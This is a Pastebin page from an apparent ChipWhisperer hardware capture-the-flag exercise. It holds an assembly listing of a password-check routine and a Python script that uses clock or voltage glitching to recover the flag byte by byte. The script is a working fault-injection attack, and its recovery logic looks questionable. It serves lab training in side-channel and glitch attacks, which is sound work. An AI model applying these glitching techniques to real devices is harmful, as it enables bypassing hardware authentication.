Pastebin
Retrouvez, créez et partagez vos snippets en temps réel.
Rechercher un Pastebin
Aucun paste trouvé.
Créer un paste
Pastebin
Blog
zbeubzbeub
// password_GH() 1 .cpu cortex-m4 2 .arch armv7e-m 3 .fpu softvfp 4 .eabi_attribute 20, 1 5 .eabi_attribute 21, 1 6 .eabi_attribute 23, 3 7 .eabi_attribute 24, 1 8 .eabi_attribute 25, 1 9 .eabi_attribute 26, 1 10 .eabi_attribute 30, 4 11 .eabi_attribute 34, 1 12 .eabi_attribute 18, 4 13 .file "simpleserial-glitch.c" 14 .text 15 .Ltext0: 16 .cfi_sections .debug_frame 17 .file 1 "simpleserial-glitch.c" 18 .section .text.password_GH,"ax",%progbits 19 .align 1 20 .global password_GH 21 .syntax unified 22 .thumb 23 .thumb_func 25 password_GH: 26 .LVL0: 27 .LFB0: 1:simpleserial-glitch.c **** /* 2:simpleserial-glitch.c **** This file is part of the ChipWhisperer Example Targets 3:simpleserial-glitch.c **** Copyright (C) 2012-2020 NewAE Technology Inc. 4:simpleserial-glitch.c **** 5:simpleserial-glitch.c **** This program is free software: you can redistribute it and/or modify 6:simpleserial-glitch.c **** it under the terms of the GNU General Public License as published by 7:simpleserial-glitch.c **** the Free Software Foundation, either version 3 of the License, or 8:simpleserial-glitch.c **** (at your option) any later version. 9:simpleserial-glitch.c **** 10:simpleserial-glitch.c **** This program is distributed in the hope that it will be useful, 11:simpleserial-glitch.c **** but WITHOUT ANY WARRANTY; without even the implied warranty of 12:simpleserial-glitch.c **** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13:simpleserial-glitch.c **** GNU General Public License for more details. 14:simpleserial-glitch.c **** 15:simpleserial-glitch.c **** You should have received a copy of the GNU General Public License 16:simpleserial-glitch.c **** along with this program. If not, see <http://www.gnu.org/licenses/>. 17:simpleserial-glitch.c **** */ 18:simpleserial-glitch.c **** 19:simpleserial-glitch.c **** #include "hal.h" 20:simpleserial-glitch.c **** #include <stdint.h> 21:simpleserial-glitch.c **** #include <stdlib.h> 22:simpleserial-glitch.c **** 23:simpleserial-glitch.c **** #include "simpleserial.h" 24:simpleserial-glitch.c **** 25:simpleserial-glitch.c **** //uint8_t infinite_loop(uint8_t* in); 26:simpleserial-glitch.c **** //uint8_t glitch_loop(uint8_t* in); 27:simpleserial-glitch.c **** //uint8_t password(uint8_t* pw); 28:simpleserial-glitch.c **** 29:simpleserial-glitch.c **** // Make sure no optimization happens for demo glitch logic. 30:simpleserial-glitch.c **** // #pragma GCC push_options 31:simpleserial-glitch.c **** // #pragma GCC optimize ("O0") 32:simpleserial-glitch.c **** 33:simpleserial-glitch.c **** uint8_t FLAG1[16] = {'G', 'H', '{', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', '}', 34:simpleserial-glitch.c **** uint8_t NOPE[16] = {'*', 'a', 'c', 'c', 'e', 's', 's', ' ', 'd', 'e', 'n', 'i', 'e', 'd', '*', 35:simpleserial-glitch.c **** 36:simpleserial-glitch.c **** #if SS_VER == SS_VER_2_1 37:simpleserial-glitch.c **** uint8_t password_GH(uint8_t cmd, uint8_t scmd, uint8_t len, uint8_t* pw) 38:simpleserial-glitch.c **** #else 39:simpleserial-glitch.c **** uint8_t password_GH(uint8_t* pw, uint8_t len) 40:simpleserial-glitch.c **** #endif 41:simpleserial-glitch.c **** { 28 .loc 1 41 5 view -0 29 .cfi_startproc 30 @ args = 0, pretend = 0, frame = 0 31 @ frame_needed = 0, uses_anonymous_args = 0 42:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 32 .loc 1 42 9 view .LVU1 43:simpleserial-glitch.c **** uint8_t result = 0; 33 .loc 1 43 9 view .LVU2 44:simpleserial-glitch.c **** int cnt; 34 .loc 1 44 9 view .LVU3 45:simpleserial-glitch.c **** 46:simpleserial-glitch.c **** trigger_high(); 35 .loc 1 46 9 view .LVU4 41:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 36 .loc 1 41 5 is_stmt 0 view .LVU5 37 0000 38B5 push {r3, r4, r5, lr} 38 .LCFI0: 39 .cfi_def_cfa_offset 16 40 .cfi_offset 3, -16 41 .cfi_offset 4, -12 42 .cfi_offset 5, -8 43 .cfi_offset 14, -4 41:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 44 .loc 1 41 5 view .LVU6 45 0002 1C46 mov r4, r3 46 .loc 1 46 9 view .LVU7 47 0004 FFF7FEFF bl trigger_high 48 .LVL1: 47:simpleserial-glitch.c **** 48:simpleserial-glitch.c **** //Simple test - doesn't check for too-long password! 49:simpleserial-glitch.c **** for(uint8_t i=0; i < 15; i++) { 49 .loc 1 49 9 is_stmt 1 view .LVU8 50 .LBB2: 51 .loc 1 49 13 view .LVU9 52 .loc 1 49 28 discriminator 1 view .LVU10 53 0008 1048 ldr r0, .L6 54 000a 621E subs r2, r4, #1 55 .LBE2: 43:simpleserial-glitch.c **** int cnt; 56 .loc 1 43 17 is_stmt 0 view .LVU11 57 000c 0023 movs r3, #0 58 000e 0E34 adds r4, r4, #14 59 .LVL2: 60 .L2: 61 .LBB3: 50:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 62 .loc 1 50 25 is_stmt 1 view .LVU12 63 .loc 1 50 32 is_stmt 0 view .LVU13 64 0010 12F8015F ldrb r5, [r2, #1]! @ zero_extendqisi2 65 .LVL3: 66 .loc 1 50 49 view .LVU14 67 0014 10F8011B ldrb r1, [r0], #1 @ zero_extendqisi2 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 68 .loc 1 49 28 discriminator 1 view .LVU15 69 0018 A242 cmp r2, r4 70 .loc 1 50 32 view .LVU16 71 001a 81EA0501 eor r1, r1, r5 72 001e 43EA0103 orr r3, r3, r1 73 .LVL4: 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 74 .loc 1 49 35 is_stmt 1 discriminator 3 view .LVU17 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 75 .loc 1 49 28 discriminator 1 view .LVU18 76 0022 F5D1 bne .L2 77 .LBE3: 51:simpleserial-glitch.c **** } 52:simpleserial-glitch.c **** if (result == 0) { 78 .loc 1 52 9 view .LVU19 79 .loc 1 52 12 is_stmt 0 view .LVU20 80 0024 43B9 cbnz r3, .L3 53:simpleserial-glitch.c **** simpleserial_put('r', 15, FLAG1); 81 .loc 1 53 25 is_stmt 1 view .LVU21 82 0026 7220 movs r0, #114 83 0028 094A ldr r2, .L6+4 84 .LVL5: 85 .loc 1 53 25 is_stmt 0 view .LVU22 86 002a 0F21 movs r1, #15 87 002c FFF7FEFF bl simpleserial_put 88 .LVL6: 54:simpleserial-glitch.c **** } else { 55:simpleserial-glitch.c **** simpleserial_put('r', 15, NOPE); 56:simpleserial-glitch.c **** } 57:simpleserial-glitch.c **** 58:simpleserial-glitch.c **** trigger_low(); 89 .loc 1 58 9 is_stmt 1 view .LVU23 90 0030 FFF7FEFF bl trigger_low 91 .LVL7: 59:simpleserial-glitch.c **** 60:simpleserial-glitch.c **** 61:simpleserial-glitch.c **** #if SS_VER == SS_VER_2_1 62:simpleserial-glitch.c **** return (result == 0) ? 0x10 : 0x00; 92 .loc 1 62 5 view .LVU24 93 .loc 1 62 33 is_stmt 0 discriminator 1 view .LVU25 94 0034 1020 movs r0, #16 95 .L4: 63:simpleserial-glitch.c **** #else 64:simpleserial-glitch.c **** return (cnt != 2500); 65:simpleserial-glitch.c **** #endif 66:simpleserial-glitch.c **** } 96 .loc 1 66 5 view .LVU26 97 0036 38BD pop {r3, r4, r5, pc} 98 .LVL8: 99 .L3: 55:simpleserial-glitch.c **** } 100 .loc 1 55 25 is_stmt 1 view .LVU27 101 0038 7220 movs r0, #114 102 003a 064A ldr r2, .L6+8 103 .LVL9: 55:simpleserial-glitch.c **** } 104 .loc 1 55 25 is_stmt 0 view .LVU28 105 003c 0F21 movs r1, #15 106 003e FFF7FEFF bl simpleserial_put 107 .LVL10: 58:simpleserial-glitch.c **** 108 .loc 1 58 9 is_stmt 1 view .LVU29 109 0042 FFF7FEFF bl trigger_low 110 .LVL11: 62:simpleserial-glitch.c **** #else 111 .loc 1 62 5 view .LVU30 62:simpleserial-glitch.c **** #else 112 .loc 1 62 33 is_stmt 0 discriminator 2 view .LVU31 113 0046 0020 movs r0, #0 114 0048 F5E7 b .L4 115 .L7: 116 004a 00BF .align 2 117 .L6: 118 004c 00000000 .word .LANCHOR0 119 0050 00000000 .word .LANCHOR1 120 0054 10000000 .word .LANCHOR1+16 121 .cfi_endproc // void trigger_high() & void trigger_low() : 355 .section .text.trigger_high,"ax",%progbits 356 .align 1 357 .global trigger_high 358 .syntax unified 359 .thumb 360 .thumb_func 362 trigger_high: 363 .LFB129: 106:.././hal//stm32f3/stm32f3_hal.c **** 107:.././hal//stm32f3/stm32f3_hal.c **** void trigger_high(void) 108:.././hal//stm32f3/stm32f3_hal.c **** { 364 .loc 1 108 1 is_stmt 1 view -0 365 .cfi_startproc 366 @ args = 0, pretend = 0, frame = 0 367 @ frame_needed = 0, uses_anonymous_args = 0 368 @ link register save eliminated. 109:.././hal//stm32f3/stm32f3_hal.c **** HAL_GPIO_WritePin(GPIOA, GPIO_PIN_12, SET); 369 .loc 1 109 3 view .LVU109 370 0000 0122 movs r2, #1 371 0002 4FF48051 mov r1, #4096 372 0006 4FF09040 mov r0, #1207959552 373 000a FFF7FEBF b HAL_GPIO_WritePin 374 .LVL10: 375 .cfi_endproc 376 .LFE129: 378 .section .text.trigger_low,"ax",%progbits 379 .align 1 380 .global trigger_low 381 .syntax unified 382 .thumb 383 .thumb_func 385 trigger_low: 386 .LFB130: 110:.././hal//stm32f3/stm32f3_hal.c **** } 111:.././hal//stm32f3/stm32f3_hal.c **** 112:.././hal//stm32f3/stm32f3_hal.c **** void trigger_low(void) 113:.././hal//stm32f3/stm32f3_hal.c **** { 387 .loc 1 113 1 view -0 388 .cfi_startproc 389 @ args = 0, pretend = 0, frame = 0 390 @ frame_needed = 0, uses_anonymous_args = 0 391 @ link register save eliminated. 114:.././hal//stm32f3/stm32f3_hal.c **** HAL_GPIO_WritePin(GPIOA, GPIO_PIN_12, RESET); 392 .loc 1 114 3 view .LVU111 393 0000 0022 movs r2, #0 394 0002 4FF48051 mov r1, #4096 395 0006 4FF09040 mov r0, #1207959552 396 000a FFF7FEBF b HAL_GPIO_WritePin 397 .LVL11: 398 .cfi_endproc // HAL_GPIO_WritePin() 2685 .section .text.HAL_GPIO_WritePin,"ax",%progbits 2686 .align 1 2687 .global HAL_GPIO_WritePin 2688 .syntax unified 2689 .thumb 2690 .thumb_func 2692 HAL_GPIO_WritePin: 2693 .LVL213: 2694 .LFB136: 778:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** 779:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** /** 780:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @brief Set or clear the selected data port bit. 781:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * 782:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @note This function uses GPIOx_BSRR and GPIOx_BRR registers to allow atomic read/modify 783:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * accesses. In this way, there is no risk of an IRQ occurring between 784:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * the read and the modify access. 785:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * 786:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param GPIOx: where x can be (A..F) to select the GPIO peripheral for STM32F3 family 787:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param GPIO_Pin: specifies the port bit to be written. 788:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * This parameter can be one of GPIO_PIN_x where x can be (0..15). 789:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param PinState: specifies the value to be written to the selected bit. 790:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * This parameter can be one of the GPIO_PinState enum values: 791:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @arg GPIO_PIN_RESET: to clear the port pin 792:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @arg GPIO_PIN_SET: to set the port pin 793:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @retval None 794:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** */ 795:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** void HAL_GPIO_WritePin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin, GPIO_PinState PinState) 796:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 2695 .loc 1 796 1 is_stmt 1 view -0 2696 .cfi_startproc 2697 @ args = 0, pretend = 0, frame = 0 2698 @ frame_needed = 0, uses_anonymous_args = 0 2699 @ link register save eliminated. 797:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** /* Check the parameters */ 798:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** assert_param(IS_GPIO_PIN(GPIO_Pin)); 2700 .loc 1 798 3 view .LVU880 799:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** assert_param(IS_GPIO_PIN_ACTION(PinState)); 2701 .loc 1 799 3 view .LVU881 800:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** 801:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** if(PinState != GPIO_PIN_RESET) 2702 .loc 1 801 3 view .LVU882 2703 .loc 1 801 5 is_stmt 0 view .LVU883 2704 0000 0AB1 cbz r2, .L185 802:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 803:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** GPIOx->BSRR = (uint32_t)GPIO_Pin; 2705 .loc 1 803 5 is_stmt 1 view .LVU884 2706 .loc 1 803 17 is_stmt 0 view .LVU885 2707 0002 8161 str r1, [r0, #24] 2708 0004 7047 bx lr 2709 .L185: 804:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 805:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** else 806:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 807:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** GPIOx->BRR = (uint32_t)GPIO_Pin; 2710 .loc 1 807 5 is_stmt 1 view .LVU886 2711 .loc 1 807 16 is_stmt 0 view .LVU887 2712 0006 8162 str r1, [r0, #40] 808:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 809:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 2713 .loc 1 809 1 view .LVU888 2714 0008 7047 bx lr 2715 .cfi_endproc # Good spots déjà trouvés good_spots = [ (10.15625, -1.171875, 6), (10.15625, 0.0, 1), (10.15625, 1.171875, 1) ] flag = ['G','H','{'] # début du flag connu # Fonction pour tester un mot de passe avec glitch def test_pw(pw_bytes, glitch): scope.glitch.width = glitch[0] scope.glitch.offset = glitch[1] scope.glitch.ext_offset = glitch[2] reboot_flush() scope.arm() target.simpleserial_write('z', bytes(pw_bytes)) if scope.capture(): return None val = target.simpleserial_read_witherrors('r', 15, timeout=20) if val is None or not val["valid"]: return None return val["payload"] # On récupère le flag byte par byte for i in range(3, 15): # bytes à glitcher print(f"\n[*] Glitching byte {i}...") found = False for glitch in good_spots: # mot de passe test: on fixe les bytes déjà connus pw_test = [0x5A] * 15 for j, c in enumerate(flag): pw_test[j] = ord(c) # brute-force sur les caractères ASCII imprimables for val in range(0x20, 0x7F): pw_test[i] = val payload = test_pw(pw_test, glitch) if payload and payload[0] == ord('G'): print(f"[+] Found byte {i}: {chr(val)}") flag.append(chr(val)) found = True break if found: break flag.append('}') print("\n==== FLAG RECOVERED ====") print("FLAG =", "".join(flag))
Créé il y a 1 mois.
